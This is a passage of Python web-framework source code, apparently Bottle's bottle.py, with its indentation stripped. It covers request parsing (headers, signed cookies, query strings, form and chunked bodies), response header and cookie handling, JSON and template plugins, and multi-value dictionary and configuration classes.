return WSGIHeaderDict(self.environ)
def get_header(self, name, default=None):
''' Return the value of a request header, or a given default value. '''
return self.headers.get(name, default)
@DictProperty('environ', 'bottle.request.cookies', read_only=True)
def cookies(self):
""" Cookies parsed into a :class:`FormsDict`. Signed cookies are NOT
decoded. Use :meth:`get_cookie` if you expect signed cookies. """
cookies = SimpleCookie(self.environ.get('HTTP_COOKIE','')).values()
return FormsDict((c.key, c.value) for c in cookies)
def get_cookie(self, key, default=None, secret=None):
""" Return the content of a cookie. To read a `Signed Cookie`, the
`secret` must match the one used to create the cookie (see
:meth:`BaseResponse.set_cookie`). If anything goes wrong (missing
cookie or wrong signature), return a default value. """
value = self.cookies.get(key)
if secret and value:
dec = cookie_decode(value, secret) # (key, value) tuple or None
return dec[1] if dec and dec[0] == key else default
return value or default
@DictProperty('environ', 'bottle.request.query', read_only=True)
def query(self):
''' The :attr:`query_string` parsed into a :class:`FormsDict`. These
values are sometimes called "URL arguments" or "GET parameters", but
not to be confused with "URL wildcards" as they are provided by the
:class:`Router`. '''
get = self.environ['bottle.get'] = FormsDict()
pairs = _parse_qsl(self.environ.get('QUERY_STRING', ''))
for key, value in pairs:
get[key] = value
return get
@DictProperty('environ', 'bottle.request.forms', read_only=True)
def forms(self):
""" Form values parsed from an `url-encoded` or `multipart/form-data`
encoded POST or PUT request body. The result is returned as a
:class:`FormsDict`. All keys and values are strings. File uploads
are stored separately in :attr:`files`. """
forms = FormsDict()
for name, item in self.POST.allitems():
if not isinstance(item, FileUpload):
forms[name] = item
return forms
@DictProperty('environ', 'bottle.request.params', read_only=True)
def params(self):
""" A :class:`FormsDict` with the combined values of :attr:`query` and
:attr:`forms`. File uploads are stored in :attr:`files`. """
params = FormsDict()
for key, value in self.query.allitems():
params[key] = value
for key, value in self.forms.allitems():
params[key] = value
return params
@DictProperty('environ', 'bottle.request.files', read_only=True)
def files(self):
""" File uploads parsed from `multipart/form-data` encoded POST or PUT
request body. The values are instances of :class:`FileUpload`.
"""
files = FormsDict()
for name, item in self.POST.allitems():
if isinstance(item, FileUpload):
files[name] = item
return files
@DictProperty('environ', 'bottle.request.json', read_only=True)
def json(self):
''' If the ``Content-Type`` header is ``application/json``, this
property holds the parsed content of the request body. Only requests
smaller than :attr:`MEMFILE_MAX` are processed to avoid memory
exhaustion. '''
ctype = self.environ.get('CONTENT_TYPE', '').lower().split(';')[0]
if ctype == 'application/json':
b = self._get_body_string()
if not b:
return None
return json_loads(b)
return None
def _iter_body(self, read, bufsize):
maxread = max(0, self.content_length)
while maxread:
part = read(min(maxread, bufsize))
if not part: break
yield part
maxread -= len(part)
def _iter_chunked(self, read, bufsize):
err = HTTPError(400, 'Error while parsing chunked transfer body.')
rn, sem, bs = tob('\r\n'), tob(';'), tob('')
while True:
header = read(1)
while header[-2:] != rn:
c = read(1)
header += c
if not c: raise err
if len(header) > bufsize: raise err
size, _, _ = header.partition(sem)
try:
maxread = int(tonat(size.strip()), 16)
except ValueError:
raise err
if maxread == 0: break
buff = bs
while maxread > 0:
if not buff:
buff = read(min(maxread, bufsize))
part, buff = buff[:maxread], buff[maxread:]
if not part: raise err
yield part
maxread -= len(part)
if read(2) != rn:
raise err
@DictProperty('environ', 'bottle.request.body', read_only=True)
def _body(self):
body_iter = self._iter_chunked if self.chunked else self._iter_body
read_func = self.environ['wsgi.input'].read
body, body_size, is_temp_file = BytesIO(), 0, False
for part in body_iter(read_func, self.MEMFILE_MAX):
body.write(part)
body_size += len(part)
if not is_temp_file and body_size > self.MEMFILE_MAX:
body, tmp = TemporaryFile(mode='w+b'), body
body.write(tmp.getvalue())
del tmp
is_temp_file = True
self.environ['wsgi.input'] = body
body.seek(0)
return body
def _get_body_string(self):
''' read body until content-length or MEMFILE_MAX into a string. Raise
HTTPError(413) on requests that are to large. '''
clen = self.content_length
if clen > self.MEMFILE_MAX:
raise HTTPError(413, 'Request to large')
if clen < 0: clen = self.MEMFILE_MAX + 1
data = self.body.read(clen)
if len(data) > self.MEMFILE_MAX: # Fail fast
raise HTTPError(413, 'Request to large')
return data
@property
def body(self):
""" The HTTP request body as a seek-able file-like object. Depending on
:attr:`MEMFILE_MAX`, this is either a temporary file or a
:class:`io.BytesIO` instance. Accessing this property for the first
time reads and replaces the ``wsgi.input`` environ variable.
Subsequent accesses just do a `seek(0)` on the file object. """
self._body.seek(0)
return self._body
@property
def chunked(self):
''' True if Chunked transfer encoding was. '''
return 'chunked' in self.environ.get('HTTP_TRANSFER_ENCODING', '').lower()
#: An alias for :attr:`query`.
GET = query
@DictProperty('environ', 'bottle.request.post', read_only=True)
def POST(self):
""" The values of :attr:`forms` and :attr:`files` combined into a single
:class:`FormsDict`. Values are either strings (form values) or
instances of :class:`cgi.FieldStorage` (file uploads).
"""
post = FormsDict()
# We default to application/x-www-form-urlencoded for everything that
# is not multipart and take the fast path (also: 3.1 workaround)
if not self.content_type.startswith('multipart/'):
pairs = _parse_qsl(tonat(self._get_body_string(), 'latin1'))
for key, value in pairs:
post[key] = value
return post
safe_env = {'QUERY_STRING':''} # Build a safe environment for cgi
for key in ('REQUEST_METHOD', 'CONTENT_TYPE', 'CONTENT_LENGTH'):
if key in self.environ: safe_env[key] = self.environ[key]
args = dict(fp=self.body, environ=safe_env, keep_blank_values=True)
if py31:
args['fp'] = NCTextIOWrapper(args['fp'], encoding='utf8',
newline='\n')
elif py3k:
args['encoding'] = 'utf8'
data = cgi.FieldStorage(**args)
self['_cgi.FieldStorage'] = data #http://bugs.python.org/issue18394#msg207958
data = data.list or []
for item in data:
if item.filename:
post[item.name] = FileUpload(item.file, item.name,
item.filename, item.headers)
else:
post[item.name] = item.value
return post
@property
def url(self):
""" The full request URI including hostname and scheme. If your app
lives behind a reverse proxy or load balancer and you get confusing
results, make sure that the ``X-Forwarded-Host`` header is set
correctly. """
return self.urlparts.geturl()
@DictProperty('environ', 'bottle.request.urlparts', read_only=True)
def urlparts(self):
''' The :attr:`url` string as an :class:`urlparse.SplitResult` tuple.
The tuple contains (scheme, host, path, query_string and fragment),
but the fragment is always empty because it is not visible to the
server. '''
env = self.environ
http = env.get('HTTP_X_FORWARDED_PROTO') or env.get('wsgi.url_scheme', 'http')
host = env.get('HTTP_X_FORWARDED_HOST') or env.get('HTTP_HOST')
if not host:
# HTTP 1.1 requires a Host-header. This is for HTTP/1.0 clients.
host = env.get('SERVER_NAME', '127.0.0.1')
port = env.get('SERVER_PORT')
if port and port != ('80' if http == 'http' else '443'):
host += ':' + port
path = urlquote(self.fullpath)
return UrlSplitResult(http, host, path, env.get('QUERY_STRING'), '')
@property
def fullpath(self):
""" Request path including :attr:`script_name` (if present). """
return urljoin(self.script_name, self.path.lstrip('/'))
@property
def query_string(self):
""" The raw :attr:`query` part of the URL (everything in between ``?``
and ``#``) as a string. """
return self.environ.get('QUERY_STRING', '')
@property
def script_name(self):
''' The initial portion of the URL's `path` that was removed by a higher
level (server or routing middleware) before the application was
called. This script path is returned with leading and tailing
slashes. '''
script_name = self.environ.get('SCRIPT_NAME', '').strip('/')
return '/' + script_name + '/' if script_name else '/'
def path_shift(self, shift=1):
''' Shift path segments from :attr:`path` to :attr:`script_name` and
vice versa.
:param shift: The number of path segments to shift. May be negative
to change the shift direction. (default: 1)
'''
script = self.environ.get('SCRIPT_NAME','/')
self['SCRIPT_NAME'], self['PATH_INFO'] = path_shift(script, self.path, shift)
@property
def content_length(self):
''' The request body length as an integer. The client is responsible to
set this header. Otherwise, the real length of the body is unknown
and -1 is returned. In this case, :attr:`body` will be empty. '''
return int(self.environ.get('CONTENT_LENGTH') or -1)
@property
def content_type(self):
''' The Content-Type header as a lowercase-string (default: empty). '''
return self.environ.get('CONTENT_TYPE', '').lower()
@property
def is_xhr(self):
''' True if the request was triggered by a XMLHttpRequest. This only
works with JavaScript libraries that support the `X-Requested-With`
header (most of the popular libraries do). '''
requested_with = self.environ.get('HTTP_X_REQUESTED_WITH','')
return requested_with.lower() == 'xmlhttprequest'
@property
def is_ajax(self):
''' Alias for :attr:`is_xhr`. "Ajax" is not the right term. '''
return self.is_xhr
@property
def auth(self):
""" HTTP authentication data as a (user, password) tuple. This
implementation currently supports basic (not digest) authentication
only. If the authentication happened at a higher level (e.g. in the
front web-server or a middleware), the password field is None, but
the user field is looked up from the ``REMOTE_USER`` environ
variable. On any errors, None is returned. """
basic = parse_auth(self.environ.get('HTTP_AUTHORIZATION',''))
if basic: return basic
ruser = self.environ.get('REMOTE_USER')
if ruser: return (ruser, None)
return None
@property
def remote_route(self):
""" A list of all IPs that were involved in this request, starting with
the client IP and followed by zero or more proxies. This does only
work if all proxies support the ```X-Forwarded-For`` header. Note
that this information can be forged by malicious clients. """
proxy = self.environ.get('HTTP_X_FORWARDED_FOR')
if proxy: return [ip.strip() for ip in proxy.split(',')]
remote = self.environ.get('REMOTE_ADDR')
return [remote] if remote else []
@property
def remote_addr(self):
""" The client IP as a string. Note that this information can be forged
by malicious clients. """
route = self.remote_route
return route[0] if route else None
def copy(self):
""" Return a new :class:`Request` with a shallow :attr:`environ` copy. """
return Request(self.environ.copy())
def get(self, value, default=None): return self.environ.get(value, default)
def __getitem__(self, key): return self.environ[key]
def __delitem__(self, key): self[key] = ""; del(self.environ[key])
def __iter__(self): return iter(self.environ)
def __len__(self): return len(self.environ)
def keys(self): return self.environ.keys()
def __setitem__(self, key, value):
""" Change an environ value and clear all caches that depend on it. """
if self.environ.get('bottle.request.readonly'):
raise KeyError('The environ dictionary is read-only.')
self.environ[key] = value
todelete = ()
if key == 'wsgi.input':
todelete = ('body', 'forms', 'files', 'params', 'post', 'json')
elif key == 'QUERY_STRING':
todelete = ('query', 'params')
elif key.startswith('HTTP_'):
todelete = ('headers', 'cookies')
for key in todelete:
self.environ.pop('bottle.request.'+key, None)
def __repr__(self):
return '<%s: %s %s>' % (self.__class__.__name__, self.method, self.url)
def __getattr__(self, name):
''' Search in self.environ for additional user defined attributes. '''
try:
var = self.environ['bottle.request.ext.%s'%name]
return var.__get__(self) if hasattr(var, '__get__') else var
except KeyError:
raise AttributeError('Attribute %r not defined.' % name)
def __setattr__(self, name, value):
if name == 'environ': return object.__setattr__(self, name, value)
self.environ['bottle.request.ext.%s'%name] = value
def _hkey(key):
if '\n' in key or '\r' in key or '\0' in key:
raise ValueError("Header names must not contain control characters: %r" % key)
return key.title().replace('_', '-')
def _hval(value):
value = tonat(value)
if '\n' in value or '\r' in value or '\0' in value:
raise ValueError("Header value must not contain control characters: %r" % value)
return value
class HeaderProperty(object):
def __init__(self, name, reader=None, writer=None, default=''):
self.name, self.default = name, default
self.reader, self.writer = reader, writer
self.__doc__ = 'Current value of the %r header.' % name.title()
def __get__(self, obj, cls):
if obj is None: return self
value = obj.get_header(self.name, self.default)
return self.reader(value) if self.reader else value
def __set__(self, obj, value):
obj[self.name] = self.writer(value) if self.writer else value
def __delete__(self, obj):
del obj[self.name]
class BaseResponse(object):
""" Storage class for a response body as well as headers and cookies.
This class does support dict-like case-insensitive item-access to
headers, but is NOT a dict. Most notably, iterating over a response
yields parts of the body and not the headers.
:param body: The response body as one of the supported types.
:param status: Either an HTTP status code (e.g. 200) or a status line
including the reason phrase (e.g. '200 OK').
:param headers: A dictionary or a list of name-value pairs.
Additional keyword arguments are added to the list of headers.
Underscores in the header name are replaced with dashes.
"""
default_status = 200
default_content_type = 'text/html; charset=UTF-8'
# Header blacklist for specific response codes
# (rfc2616 section 10.2.3 and 10.3.5)
bad_headers = {
204: set(('Content-Type',)),
304: set(('Allow', 'Content-Encoding', 'Content-Language',
'Content-Length', 'Content-Range', 'Content-Type',
'Content-Md5', 'Last-Modified'))}
def __init__(self, body='', status=None, headers=None, **more_headers):
self._cookies = None
self._headers = {}
self.body = body
self.status = status or self.default_status
if headers:
if isinstance(headers, dict):
headers = headers.items()
for name, value in headers:
self.add_header(name, value)
if more_headers:
for name, value in more_headers.items():
self.add_header(name, value)
def copy(self, cls=None):
''' Returns a copy of self. '''
cls = cls or BaseResponse
assert issubclass(cls, BaseResponse)
copy = cls()
copy.status = self.status
copy._headers = dict((k, v[:]) for (k, v) in self._headers.items())
if self._cookies:
copy._cookies = SimpleCookie()
copy._cookies.load(self._cookies.output(header=''))
return copy
def __iter__(self):
return iter(self.body)
def close(self):
if hasattr(self.body, 'close'):
self.body.close()
@property
def status_line(self):
''' The HTTP status line as a string (e.g. ``404 Not Found``).'''
return self._status_line
@property
def status_code(self):
''' The HTTP status code as an integer (e.g. 404).'''
return self._status_code
def _set_status(self, status):
if isinstance(status, int):
code, status = status, _HTTP_STATUS_LINES.get(status)
elif ' ' in status:
status = status.strip()
code = int(status.split()[0])
else:
raise ValueError('String status line without a reason phrase.')
if not 100 <= code <= 999: raise ValueError('Status code out of range.')
self._status_code = code
self._status_line = str(status or ('%d Unknown' % code))
def _get_status(self):
return self._status_line
status = property(_get_status, _set_status, None,
''' A writeable property to change the HTTP response status. It accepts
either a numeric code (100-999) or a string with a custom reason
phrase (e.g. "404 Brain not found"). Both :data:`status_line` and
:data:`status_code` are updated accordingly. The return value is
always a status string. ''')
del _get_status, _set_status
@property
def headers(self):
''' An instance of :class:`HeaderDict`, a case-insensitive dict-like
view on the response headers. '''
hdict = HeaderDict()
hdict.dict = self._headers
return hdict
def __contains__(self, name): return _hkey(name) in self._headers
def __delitem__(self, name): del self._headers[_hkey(name)]
def __getitem__(self, name): return self._headers[_hkey(name)][-1]
def __setitem__(self, name, value): self._headers[_hkey(name)] = [_hval(value)]
def get_header(self, name, default=None):
''' Return the value of a previously defined header. If there is no
header with that name, return a default value. '''
return self._headers.get(_hkey(name), [default])[-1]
def set_header(self, name, value):
''' Create a new response header, replacing any previously defined
headers with the same name. '''
self._headers[_hkey(name)] = [_hval(value)]
def add_header(self, name, value):
''' Add an additional response header, not removing duplicates. '''
self._headers.setdefault(_hkey(name), []).append(_hval(value))
def iter_headers(self):
''' Yield (header, value) tuples, skipping headers that are not
allowed with the current response status code. '''
return self.headerlist
@property
def headerlist(self):
""" WSGI conform list of (header, value) tuples. """
out = []
headers = list(self._headers.items())
if 'Content-Type' not in self._headers:
headers.append(('Content-Type', [self.default_content_type]))
if self._status_code in self.bad_headers:
bad_headers = self.bad_headers[self._status_code]
headers = [h for h in headers if h[0] not in bad_headers]
out += [(name, val) for (name, vals) in headers for val in vals]
if self._cookies:
for c in self._cookies.values():
out.append(('Set-Cookie', _hval(c.OutputString())))
if py3k:
out = [(k, v.encode('utf8').decode('latin1')) for (k, v) in out]
return out
content_type = HeaderProperty('Content-Type')
content_length = HeaderProperty('Content-Length', reader=int)
expires = HeaderProperty('Expires',
reader=lambda x: datetime.utcfromtimestamp(parse_date(x)),
writer=lambda x: http_date(x))
@property
def charset(self, default='UTF-8'):
""" Return the charset specified in the content-type header (default: utf8). """
if 'charset=' in self.content_type:
return self.content_type.split('charset=')[-1].split(';')[0].strip()
return default
def set_cookie(self, name, value, secret=None, **options):
''' Create a new cookie or replace an old one. If the `secret` parameter is
set, create a `Signed Cookie` (described below).
:param name: the name of the cookie.
:param value: the value of the cookie.
:param secret: a signature key required for signed cookies.
Additionally, this method accepts all RFC 2109 attributes that are
supported by :class:`cookie.Morsel`, including:
:param max_age: maximum age in seconds. (default: None)
:param expires: a datetime object or UNIX timestamp. (default: None)
:param domain: the domain that is allowed to read the cookie.
(default: current domain)
:param path: limits the cookie to a given path (default: current path)
:param secure: limit the cookie to HTTPS connections (default: off).
:param httponly: prevents client-side javascript to read this cookie
(default: off, requires Python 2.6 or newer).
If neither `expires` nor `max_age` is set (default), the cookie will
expire at the end of the browser session (as soon as the browser
window is closed).
Signed cookies may store any pickle-able object and are
cryptographically signed to prevent manipulation. Keep in mind that
cookies are limited to 4kb in most browsers.
Warning: Signed cookies are not encrypted (the client can still see
the content) and not copy-protected (the client can restore an old
cookie). The main intention is to make pickling and unpickling
save, not to store secret information at client side.
'''
if not self._cookies:
self._cookies = SimpleCookie()
if secret:
value = touni(cookie_encode((name, value), secret))
elif not isinstance(value, basestring):
raise TypeError('Secret key missing for non-string Cookie.')
if len(value) > 4096: raise ValueError('Cookie value to long.')
self._cookies[name] = value
for key, value in options.items():
if key == 'max_age':
if isinstance(value, timedelta):
value = value.seconds + value.days * 24 * 3600
if key == 'expires':
if isinstance(value, (datedate, datetime)):
value = value.timetuple()
elif isinstance(value, (int, float)):
value = time.gmtime(value)
value = time.strftime("%a, %d %b %Y %H:%M:%S GMT", value)
self._cookies[name][key.replace('_', '-')] = value
def delete_cookie(self, key, **kwargs):
''' Delete a cookie. Be sure to use the same `domain` and `path`
settings as used to create the cookie. '''
kwargs['max_age'] = -1
kwargs['expires'] = 0
self.set_cookie(key, '', **kwargs)
def __repr__(self):
out = ''
for name, value in self.headerlist:
out += '%s: %s\n' % (name.title(), value.strip())
return out
def local_property(name=None):
if name: depr('local_property() is deprecated and will be removed.') #0.12
ls = threading.local()
def fget(self):
try: return ls.var
except AttributeError:
raise RuntimeError("Request context not initialized.")
def fset(self, value): ls.var = value
def fdel(self): del ls.var
return property(fget, fset, fdel, 'Thread-local property')
class LocalRequest(BaseRequest):
''' A thread-local subclass of :class:`BaseRequest` with a different
set of attributes for each thread. There is usually only one global
instance of this class (:data:`request`). If accessed during a
request/response cycle, this instance always refers to the *current*
request (even on a multithreaded server). '''
bind = BaseRequest.__init__
environ = local_property()
class LocalResponse(BaseResponse):
''' A thread-local subclass of :class:`BaseResponse` with a different
set of attributes for each thread. There is usually only one global
instance of this class (:data:`response`). Its attributes are used
to build the HTTP response at the end of the request/response cycle.
'''
bind = BaseResponse.__init__
_status_line = local_property()
_status_code = local_property()
_cookies = local_property()
_headers = local_property()
body = local_property()
Request = BaseRequest
Response = BaseResponse
class HTTPResponse(Response, BottleException):
def __init__(self, body='', status=None, headers=None, **more_headers):
super(HTTPResponse, self).__init__(body, status, headers, **more_headers)
def apply(self, response):
response._status_code = self._status_code
response._status_line = self._status_line
response._headers = self._headers
response._cookies = self._cookies
response.body = self.body
class HTTPError(HTTPResponse):
default_status = 500
def __init__(self, status=None, body=None, exception=None, traceback=None,
**options):
self.exception = exception
self.traceback = traceback
super(HTTPError, self).__init__(body, status, **options)
###############################################################################
# Plugins ######################################################################
###############################################################################
class PluginError(BottleException): pass
class JSONPlugin(object):
name = 'json'
api = 2
def __init__(self, json_dumps=json_dumps):
self.json_dumps = json_dumps
def apply(self, callback, route):
dumps = self.json_dumps
if not dumps: return callback
def wrapper(*a, **ka):
try:
rv = callback(*a, **ka)
except HTTPError:
rv = _e()
if isinstance(rv, dict):
#Attempt to serialize, raises exception on failure
json_response = dumps(rv)
#Set content type only if serialization succesful
response.content_type = 'application/json'
return json_response
elif isinstance(rv, HTTPResponse) and isinstance(rv.body, dict):
rv.body = dumps(rv.body)
rv.content_type = 'application/json'
return rv
return wrapper
class TemplatePlugin(object):
''' This plugin applies the :func:`view` decorator to all routes with a
`template` config parameter. If the parameter is a tuple, the second
element must be a dict with additional options (e.g. `template_engine`)
or default variables for the template. '''
name = 'template'
api = 2
def apply(self, callback, route):
conf = route.config.get('template')
if isinstance(conf, (tuple, list)) and len(conf) == 2:
return view(conf[0], **conf[1])(callback)
elif isinstance(conf, str):
return view(conf)(callback)
else:
return callback
#: Not a plugin, but part of the plugin API. TODO: Find a better place.
class _ImportRedirect(object):
def __init__(self, name, impmask):
''' Create a virtual package that redirects imports (see PEP 302). '''
self.name = name
self.impmask = impmask
self.module = sys.modules.setdefault(name, new_module(name))
self.module.__dict__.update({'__file__': __file__, '__path__': [],
'__all__': [], '__loader__': self})
sys.meta_path.append(self)
def find_module(self, fullname, path=None):
if '.' not in fullname: return
packname = fullname.rsplit('.', 1)[0]
if packname != self.name: return
return self
def load_module(self, fullname):
if fullname in sys.modules: return sys.modules[fullname]
modname = fullname.rsplit('.', 1)[1]
realname = self.impmask % modname
__import__(realname)
module = sys.modules[fullname] = sys.modules[realname]
setattr(self.module, modname, module)
module.__loader__ = self
return module
###############################################################################
# Common Utilities #############################################################
###############################################################################
class MultiDict(DictMixin):
""" This dict stores multiple values per key, but behaves exactly like a
normal dict in that it returns only the newest value for any given key.
There are special methods available to access the full list of values.
"""
def __init__(self, *a, **k):
self.dict = dict((k, [v]) for (k, v) in dict(*a, **k).items())
def __len__(self): return len(self.dict)
def __iter__(self): return iter(self.dict)
def __contains__(self, key): return key in self.dict
def __delitem__(self, key): del self.dict[key]
def __getitem__(self, key): return self.dict[key][-1]
def __setitem__(self, key, value): self.append(key, value)
def keys(self): return self.dict.keys()
if py3k:
def values(self): return (v[-1] for v in self.dict.values())
def items(self): return ((k, v[-1]) for k, v in self.dict.items())
def allitems(self):
return ((k, v) for k, vl in self.dict.items() for v in vl)
iterkeys = keys
itervalues = values
iteritems = items
iterallitems = allitems
else:
def values(self): return [v[-1] for v in self.dict.values()]
def items(self): return [(k, v[-1]) for k, v in self.dict.items()]
def iterkeys(self): return self.dict.iterkeys()
def itervalues(self): return (v[-1] for v in self.dict.itervalues())
def iteritems(self):
return ((k, v[-1]) for k, v in self.dict.iteritems())
def iterallitems(self):
return ((k, v) for k, vl in self.dict.iteritems() for v in vl)
def allitems(self):
return [(k, v) for k, vl in self.dict.iteritems() for v in vl]
def get(self, key, default=None, index=-1, type=None):
''' Return the most recent value for a key.
:param default: The default value to be returned if the key is not
present or the type conversion fails.
:param index: An index for the list of available values.
:param type: If defined, this callable is used to cast the value
into a specific type. Exception are suppressed and result in
the default value to be returned.
'''
try:
val = self.dict[key][index]
return type(val) if type else val
except Exception:
pass
return default
def append(self, key, value):
''' Add a new value to the list of values for this key. '''
self.dict.setdefault(key, []).append(value)
def replace(self, key, value):
''' Replace the list of values with a single value. '''
self.dict[key] = [value]
def getall(self, key):
''' Return a (possibly empty) list of values for a key. '''
return self.dict.get(key) or []
#: Aliases for WTForms to mimic other multi-dict APIs (Django)
getone = get
getlist = getall
class FormsDict(MultiDict):
''' This :class:`MultiDict` subclass is used to store request form data.
Additionally to the normal dict-like item access methods (which return
unmodified data as native strings), this container also supports
attribute-like access to its values. Attributes are automatically de-
or recoded to match :attr:`input_encoding` (default: 'utf8'). Missing
attributes default to an empty string. '''
#: Encoding used for attribute values.
input_encoding = 'utf8'
#: If true (default), unicode strings are first encoded with `latin1`
#: and then decoded to match :attr:`input_encoding`.
recode_unicode = True
def _fix(self, s, encoding=None):
if isinstance(s, unicode) and self.recode_unicode: # Python 3 WSGI
return s.encode('latin1').decode(encoding or self.input_encoding)
elif isinstance(s, bytes): # Python 2 WSGI
return s.decode(encoding or self.input_encoding)
else:
return s
def decode(self, encoding=None):
''' Returns a copy with all keys and values de- or recoded to match
:attr:`input_encoding`. Some libraries (e.g. WTForms) want a
unicode dictionary. '''
copy = FormsDict()
enc = copy.input_encoding = encoding or self.input_encoding
copy.recode_unicode = False
for key, value in self.allitems():
copy.append(self._fix(key, enc), self._fix(value, enc))
return copy
def getunicode(self, name, default=None, encoding=None):
''' Return the value as a unicode string, or the default. '''
try:
return self._fix(self[name], encoding)
except (UnicodeError, KeyError):
return default
def __getattr__(self, name, default=unicode()):
# Without this guard, pickle generates a cryptic TypeError:
if name.startswith('__') and name.endswith('__'):
return super(FormsDict, self).__getattr__(name)
return self.getunicode(name, default=default)
class HeaderDict(MultiDict):
""" A case-insensitive version of :class:`MultiDict` that defaults to
replace the old value instead of appending it. """
def __init__(self, *a, **ka):
self.dict = {}
if a or ka: self.update(*a, **ka)
def __contains__(self, key): return _hkey(key) in self.dict
def __delitem__(self, key): del self.dict[_hkey(key)]
def __getitem__(self, key): return self.dict[_hkey(key)][-1]
def __setitem__(self, key, value): self.dict[_hkey(key)] = [_hval(value)]
def append(self, key, value): self.dict.setdefault(_hkey(key), []).append(_hval(value))
def replace(self, key, value): self.dict[_hkey(key)] = [_hval(value)]
def getall(self, key): return self.dict.get(_hkey(key)) or []
def get(self, key, default=None, index=-1):
return MultiDict.get(self, _hkey(key), default, index)
def filter(self, names):
for name in (_hkey(n) for n in names):
if name in self.dict:
del self.dict[name]
class WSGIHeaderDict(DictMixin):
''' This dict-like class wraps a WSGI environ dict and provides convenient
access to HTTP_* fields. Keys and values are native strings
(2.x bytes or 3.x unicode) and keys are case-insensitive. If the WSGI
environment contains non-native string values, these are de- or encoded
using a lossless 'latin1' character set.
The API will remain stable even on changes to the relevant PEPs.
Currently PEP 333, 444 and 3333 are supported. (PEP 444 is the only one
that uses non-native strings.)
'''
#: List of keys that do not have a ``HTTP_`` prefix.
cgikeys = ('CONTENT_TYPE', 'CONTENT_LENGTH')
def __init__(self, environ):
self.environ = environ
def _ekey(self, key):
''' Translate header field name to CGI/WSGI environ key. '''
key = key.replace('-','_').upper()
if key in self.cgikeys:
return key
return 'HTTP_' + key
def raw(self, key, default=None):
''' Return the header value as is (may be bytes or unicode). '''
return self.environ.get(self._ekey(key), default)
def __getitem__(self, key):
return tonat(self.environ[self._ekey(key)], 'latin1')
def __setitem__(self, key, value):
raise TypeError("%s is read-only." % self.__class__)
def __delitem__(self, key):
raise TypeError("%s is read-only." % self.__class__)
def __iter__(self):
for key in self.environ:
if key[:5] == 'HTTP_':
yield key[5:].replace('_', '-').title()
elif key in self.cgikeys:
yield key.replace('_', '-').title()
def keys(self): return [x for x in self]
def __len__(self): return len(self.keys())
def __contains__(self, key): return self._ekey(key) in self.environ
class ConfigDict(dict):
''' A dict-like configuration storage with additional support for
namespaces, validators, meta-data, on_change listeners and more.
This storage is optimized for fast read access. Retrieving a key
or using non-altering dict methods (e.g. `dict.get()`) has no overhead
compared to a native dict.
'''
__slots__ = ('_meta', '_on_change')
class Namespace(DictMixin):
def __init__(self, config, namespace):
self._config = config
self._prefix = namespace
def __getitem__(self, key):
depr('Accessing namespaces as dicts is discouraged. '
'Only use flat item access: '
'cfg["names"]["pace"]["key"] -> cfg["name.space.key"]') #0.12
return self._config[self._prefix + '.' + key]
def __setitem__(self, key, value):
self._config[self._prefix + '.' + key] = value
def __delitem__(self, key):
del self._config[self._prefix + '.' + key]
def __iter__(self):
ns_prefix = self._prefix + '.'
for key in self._config:
ns, dot, name = key.rpartition('.')
if ns == self._prefix and name:
yield name
def keys(self): return [x for x in self]
def __len__(self): return len(self.keys())
def __contains__(self, key): return self._prefix + '.' + key in self._config
def __repr__(self): return '<Config.Namespace %s.*>' % self._prefix
def __str__(self): return '<Config.Namespace %s.*>' % self._prefix
# Deprecated ConfigDict features
def __getattr__(self, key):
depr('Attribute access is deprecated.') #0.12
if key not in self and key[0].isupper():
self[key] = ConfigDict.Namespace(self._config, self._prefix + '.' + key)
if key not in self and key.startswith('__'):
raise AttributeError(key)
return self.get(key)
def __setattr__(self, key, value):
if key in ('_config', '_prefix'):
self.__dict__[key] = value
return
depr('Attribute assignment is deprecated.') #0.12
if hasattr(DictMixin, key):
raise AttributeError('Read-only attribute.')
if key in self and self[key] and isinstance(self[key], self.__class__):
raise AttributeError('Non-empty namespace attribute.')
self[key] = value
def __delattr__(self, key):
if key in self:
val = self.pop(key)
if isinstance(val, self.__class__):
prefix = key + '.'
for key in self:
if key.startswith(prefix):
del self[prefix+key]
def __call__(self, *a, **ka):
depr('Calling ConfDict is deprecated. Use the update() method.') #0.12
self.update(*a, **ka)
return self
def __init__(self, *a, **ka):
self._meta = {}
self._on_change = lambda name, value: None
if a or ka:
depr('Constructor does no longer accept parameters.') #0.12
self.update(*a, **ka)
def load_config(self, filename):
''' Load values from an *.ini style config file.
If the config file contains sections, their names are used as
namespaces for the values within. The two special sections
``DEFAULT`` and ``bottle`` refer to the root namespace (no prefix).
'''
conf = ConfigParser()
conf.read(filename)
for section in conf.sections():
for key, value in conf.items(section):
if section not in ('DEFAULT', 'bottle'):
key = section + '.' + key
self[key] = value
return self
def load_dict(self, source, namespace='', make_namespaces=False):
''' Import values from a dictionary structure. Nesting can be used to
represent namespaces.
>>> ConfigDict().load_dict({'name': {'space': {'key': 'value'}}})
{'name.space.key': 'value'}
'''
stack = [(namespace, source)]
while stack:
prefix, source = stack.pop()
if not isinstance(source, dict):
raise TypeError('Source is not a dict (r)' % type(key))
for key, value in source.items():
if not isinstance(key, basestring):
raise TypeError('Key is not a string (%r)' % type(key))
full_key = prefix + '.' + key if prefix else key
if isinstance(value, dict):
stack.append((full_key, value))
if make_namespaces:
self[full_key] = self.Namespace(self, full_key)
else:
self[full_key] = value
return self
def update(self, *a, **ka):
''' If the first parameter is a string, all keys are prefixed with this
namespace. Apart from that it works just as the usual dict.update().
Example: ``update('some.namespace', key='value')`` '''
prefix = ''
if a and isinstance(a[0], basestring):
prefix = a[0].strip('.') + '.'
a = a[1:]
for key, value in dict(*a, **ka).items():
self[prefix+key] = value
def setdefault(self, key, value):
if key not in self:
self[key] = value
return self[key]
def __setitem__(self, key, value):
if not isinstance(key, basestring):
raise TypeError('Key has type %r (not a string)' % type(key))
value = self.meta_get(key, 'filter', lambda x: x)(value)
if key in self and self[key] is value:
return
self._on_change(key, value)
dict.__setitem__(self, key, value)
def __delitem__(self, key):
dict.__delitem__(self, key)
def clear(self):
for key in self:
del self[key]
def meta_get(self, key, metafield, default=None):
''' Return the value of a meta field for a key. '''
return self._meta.get(key, {}).get(metafield, default)
def meta_set(self, key, metafield, value):
''' Set the meta field for a key to a new value. This triggers the
on-change handler for existing keys. '''
self._meta.setdefault(key, {})[metafield] = value
if key in self:
self[key] = self[key]
def meta_list(self, key):
''' Return an iterable of meta field names defined for a key. '''
return self._meta.get(key, {}).keys()
# Deprecated ConfigDict features
def __getattr__(self, key):
depr('Attribute access is deprecated.') #0.12
if key not in self and key[0].isupper():
self[key] = self.Namespace(self, key)
if key not in self and key.startswith('__'):
raise AttributeError(key)
return self.get(key)
def __setattr__(self, key, value):
if key in self.__slots__:
return dict.__setattr__(self, key, value)
